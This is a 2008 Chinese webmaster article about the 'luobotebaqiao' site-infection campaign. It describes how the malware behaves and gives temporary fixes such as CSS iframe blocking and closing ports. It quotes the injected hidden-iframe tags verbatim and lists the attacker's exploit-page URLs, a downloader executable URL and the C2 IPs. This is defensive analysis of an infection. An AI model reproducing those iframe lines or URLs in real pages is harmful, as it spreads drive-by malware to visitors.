当前位置:首页 > 网站运营 > 经验心得 > > luobotebaqiao病毒防治临时解决方案

luobotebaqiao病毒防治临时解决方案

点击次数:29 次 发布日期:2008-11-16 10:08:39 作者:源代码网
源代码网推荐

源代码网整理以下      前段时间,自己服务器上中了病毒luobotebaqiao,这个挂马者也真是垃圾。地震期间,竟然把知名的公益网站也给挂马。其良心真是大大地坏啊。刚开始的挂马代码是:<iframe src=http://1.luobotebaqiao.info/index.htm width=0 height=0></iframe>,<iframe src=http://2.luobotebaqiao.info/index.htm width=0 height=0></iframe>
     而现在的挂马代码是<iframe src=http://ddd.luobotebaqiao.org/ddddd.htm width=0 height=0></iframe>  看到一个论坛上说的是大名鼎鼎的赛迪网也给它袭击了。我在google搜索的时候,出现这个画面。

源代码网整理以下  

中国IT技术服务网

源代码网整理以下 

源代码网整理以下  中毒现象表现为:用最新的360安全卫士查杀不到,装360的防火墙也无济于事,其他的杀毒软件也都查不出来,但重启主机就暂时又不见了,过一段时间就可能又出现了,周六和周日表现比较频繁;

源代码网整理以下  以下是我在网上搜集的资料:

源代码网整理以下  http://ddd.luobotebaqiao.org/ddddd.htm

源代码网整理以下  http://ddd.luobotebaqiao.org/14.htm MS06014

源代码网整理以下  http://ddd.luobotebaqiao.org/rl.htm realone

源代码网整理以下  http://ddd.luobotebaqiao.org/new.htm realone11

源代码网整理以下  http://ddd.luobotebaqiao.org/lz.htm 联众0DAY

源代码网整理以下  http://ddd.luobotebaqiao.org/bf.htm 爆风

源代码网整理以下  http://ddd.luobotebaqiao.org/xl.htm 没见到内容. 看名字应该是要挂迅雷的

源代码网整理以下  刚刚下了下,以前的记录. 以上几个马. 均跟以前:1.luobotebaqiao.info 中的网马一样.

源代码网整理以下  下载者:http://exe.luobotebaqiao.net/w3.exe

源代码网整理以下  本人刚刚是准备脱壳,再看下这个东西,下的是什么. 结果,搞半天.也没搞出来.

源代码网整理以下  壳脱了,也没看到. 本人又不会用OD 查看下载地址. 准备用嗅探. 嗅下子. 结果,没的工具.

源代码网整理以下  所以. 就直接运行了它. 效果不错.

源代码网整理以下  直接运行w3.exe 后. 首先会调用进程:svchost.exe 用户名: 当前管理员. 非SYSTEM

源代码网整理以下  连接到:222.186.13.200 这个地址.

源代码网整理以下  接着. 会连接到60.191.208.235 下载N 多木马. 木马后缀名:msi .

源代码网整理以下  如果连接失败. 比如: 本人用IPSEC 将这个IP 封掉. 那么.过几分钟后.

源代码网整理以下  会连到:60.191.215.126 将从这里,下载N 多木马. 后缀名:MSI.

源代码网整理以下  这两个下载木马的IP 的关系. : 先调用60.191.208.235 这个服务器.

源代码网整理以下  如果失败, 再调用60.191.215.126 如果,两个都失败了.则关闭连接. 任意一个成功后,

源代码网整理以下  比如: 第一个成功下载下来木马, 完成后关闭连接. 不连第二个.

源代码网整理以下  下载下来的木马,均以 msi 后缀来运行.

源代码网整理以下  文件名: _qosec0.msi _qosec2.msi 这种类型!

源代码网整理以下  从_qosec0.msi 一直到_qosec34.msi . 总共30几个木马.

源代码网整理以下  木马所在地: C:Documents and SettingsAdministratorLocal SettingsTemp

源代码网整理以下  如果,你使用了本人的 软件策略, 那么, 你可以在这里看到. 30几个木马,外加几十个BAT批处理 文件.

源代码网整理以下  用来删除木马文件的. 并且不会中毒.

源代码网整理以下  解决方法:1:在css代码里屏蔽 iframe ,我以前写过文章地址:http://www.admin5.com/article/20071129/63757.shtml,你可以写一个网页把css代码写入,然后保存为html文件,在服务器的IIS文档启用文档页脚把刚才的那个页面附加上,这个页面给everyone读取权限。不过用此法的话,会把JS文件屏蔽掉。

源代码网整理以下 

源代码网整理以下  2:关闭服务器上无用的端口(建议保留80端口和远程桌面端口。如果有FTP的话可以打开21端口,根据情况定,不过建议还是临时关闭ftp端口),在服务器的防火墙上只开这三个端口。对于杀毒软件可以设置其能访问网络。

源代码网整理以下  目前此病毒已经被列入很多杀毒软件厂商的名单,

源代码网整理以下  此文仅供参考!文章首发:中国IT技术服务网

源代码网供稿.
网友评论 (0)
我也要写评论
会员中心
网站运营
本站推荐
网站运营之精华